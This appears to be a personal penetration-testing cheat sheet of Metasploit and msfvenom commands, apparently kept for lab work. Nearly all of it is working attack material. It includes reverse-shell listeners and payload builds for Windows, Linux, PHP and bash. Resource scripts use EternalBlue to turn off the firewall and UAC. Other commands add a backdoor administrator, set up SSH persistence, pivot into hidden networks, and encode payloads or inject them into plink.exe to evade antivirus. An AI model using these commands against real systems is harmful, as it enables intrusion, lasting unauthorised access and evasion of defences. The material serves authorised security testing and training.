Metasploit
doc https://pentestwiki.org/msfvenom-payloads-cheat-sheet/ https://book.hacktricks.xyz/generic-methodologies-and-resources/shells/msfvenom
multi/recon/local_exploit_suggester
List payloads
msfvenom -l payloads --platform windows --arch x64
Reverse listener
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
Oneliner reverse listener
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD windows/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4445; exploit"
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x86/meterpreter/reverse_tcp; set LHOST tun0; set LPORT 4445; exploit"
list possible vulnerabilities
multi/recon/local_exploit_suggester
auxiliary/scanner/redis/redis_server
use auxiliary/scanner/mongodb/mongodb_login
Smtp enumeration
auxiliary/scanner/smtp/smtp_enum
Create a backdoor (send a payload every 10 second)
use exploit/windows/local/persistence
Kerberos user enumeration
use auxiliary/gather/kerberos_enumusers
LLMNR
auxiliary/spoof/llmnr/llmnr_response
Setup
start the database service as well as create and initialize the MSF database
sudo msfdb init
# start db
sudo systemctl enable postgresql
Use script
<ruby>
print_status("Backdoor user Settings... for 10.10.10.10")
run_single("use auxiliary/admin/smb/ms17_010_command")
run_single("set RHOSTS 10.10.10.10")
print_status("View backdoor user: share_admin")
run_single("set COMMAND 'net user share_admin")
run_single("run")
</ruby>
<ruby>
print_status("Turn Firewall Windows OFF")
run_single("use auxiliary/admin/smb/ms17_010_command")
run_single("set RHOSTS 10.10.10.10")
run_single("set SMBPass ")
run_single("set SMBUser ")
print_status("Turn off firewall for all networks")
run_single('set COMMAND "netsh advfirewall set allprofiles state off"')
run_single("run")
print_status("Show current firewall profile")
run_single('set COMMAND "netsh advfirewall show currentprofile"')
run_single("run")
print_status("Disable UAC")
run_single('set COMMAND "reg.exe ADD HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System /v EnableLUA /t REG_DWORD /d 0 /f"')
run_single("run")
print_status("Enable Local Account Token")
run_single('set COMMAND "reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\system /v LocalAccountTokenFilterPolicy /t REG_DWORD /d 1 /f"')
run_single("run")
</ruby>%
Use the script
proxychains -q msfconsole -q -x "resource script.rc"
Pivot
https://pentest.blog/explore-hidden-networks-with-double-pivoting/
Adds a route
run autoroute -s 7.7.7.0/24
List all routes
run autoroute -p
Detect ip address
run post/windows/gather/arp_scanner RHOSTS=7.7.7.0/24
MsfVenom
https://www.offensive-security.com/metasploit-unleashed/Msfvenom/ https://thedarksource.com/msfvenom-cheat-sheet-create-metasploit-payloads/
List payloads
msfvenom -l payloads
List the encoders
msfvenom --list encoders
Generate a x64 reverse shell
msfvenom -a x64 --platform windows -p windows/x64/shell_reverse_tcp LHOST=$IP LPORT=443 -f exe -o reverse.exe
# Variation
msfvenom -a x64 --platform windows -p windows/x64/shell/reverse_tcp LHOST=$IP LPORT=443 -f exe -o reverse.exe
# For x32, just remove -a x64
other reverse shell payload generation
msfvenom -p windows/x64/shell_reverse_tcpLHOST=ATTACKING_10.10.49.211 LPORT=LOCAL_PORT -f msi -o malicious.msi
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai -i 9 LHOST=10.11.21.99 LPORT=4444 -f exe -o reverse_shell.exe
msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.11.21.99 LPORT=4444 -f exe > revshell.exe
msfvenom -p windows/meterpreter/reverse_tcp -a x86 --encoder x86/shikata_ga_nai -i 9 LHOST=10.11.21.99 LPORT=4445 -f exe -o revshell.exe
msfvenom -p php/reverse_php LHOST=10.8.28.34 LPORT=1234 -f raw > phpwindowsreverse.php
msfvenom -p cmd/unix/reverse_bash LHOST=192.168.49.196 LPORT=2222 -f raw > shell.sh
Ping
msfvenom -p windows/exec CMD='cmd.exe /k "ping -n 2 172.16.40.5"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Turn off firewall for all networks
msfvenom -p windows/exec CMD='netsh advfirewall set allprofiles state off' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Delete user Cory
msfvenom -p windows/exec CMD='cmd.exe /k "net user cory /delete"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Delete add Cory as admin
msfvenom -p windows/exec CMD='cmd.exe /k "net user /add cory Wind0wz87!kj && net localgroup administrators cory /add"' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Enable remote desktop
msfvenom -p windows/exec CMD='cmd.exe /k reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f' EXITFUNC=thread -b "\x00\x0a" -f py -v payload -e x86/shikata_ga_nai
Case: limited reverse shell (3 sec ttl) Execute ssh persistence
msfconsole -q -x "use exploit/multi/handler; set PAYLOAD linux/x64/meterpreter/reverse_tcp; ; set AutoRunScript post/linux/manage/sshkey_persistence; set LHOST 127.0.0.1; set LPORT 6000; run -j; set LPORT 6001; run -j; set LPORT 6002; run -j; set LPORT 6003; run -j; set LPORT 6004; run -j; set LPORT 6005; run -j; set LPORT 6006; run -j; set LPORT 6007; run -j; set LPORT 6008; run -j; set LPORT 6009; run -j; set LPORT 6010; run -j; set SessionCommunicationTimeout 0; set ExitOnSession false; run"
Using setup.rc, a script in which we will set the payload to windows/meterpreter/reverse_https and configure the relevant LHOST and LPORT parameters. We also enable stage encoding using the x86/shikata_ga_nai encoder and configure the post/windows/manage/migrate module to be executed automatically using the AutoRunScript option. This will cause the spawned meterpreter to automatically launch a background notepad.exe process and migrate to it. Finally, the
# ExitOnSession parameter is set to "false" to ensure that the listener keeps accepting new connections and the module is executed with the -j and -z flags to stop us from automatically interacting with the session
use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_https
set LHOST 10.11.0.4
set LPORT 443
set EnableStageEncoding true
set StageEncoder x86/shikata_ga_nai
set AutoRunScript post/windows/manage/migrate
set ExitOnSession false
exploit -j -z
Then we can run the script with
sudo msfconsole -r setup.rc
With the listener configured and running, we can, for example, launch an executable containing a meterpreter payload from our Windows VM. We can create this executable with msfvenom:
msfvenom -p windows/meterpreter/reverse_https LHOST=10.11.0.4 LPORT=443 -f exe -o met.exe
When executed (exploit), our multi/handler accepts the connection and the session was spawned using an encoded second stage payload and successfully migrated automatically into the notepad.exe process.
evade/evasion antivirus (Av)
Inject a payload into an existing PE file,
# Encode and do 9 iterations
msfvenom -p windows/shell_reverse_tcp LHOST=192.168.118.2 LPORT=443 -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe
# Same command through msfconsole
msf6 payload(windows/shell_reverse_tcp) > generate -f exe -e x86/shikata_ga_nai -i 9 -x /usr/share/windows-resources/binaries/plink.exe -o shell_reverse_msf_encoded_embedded.exe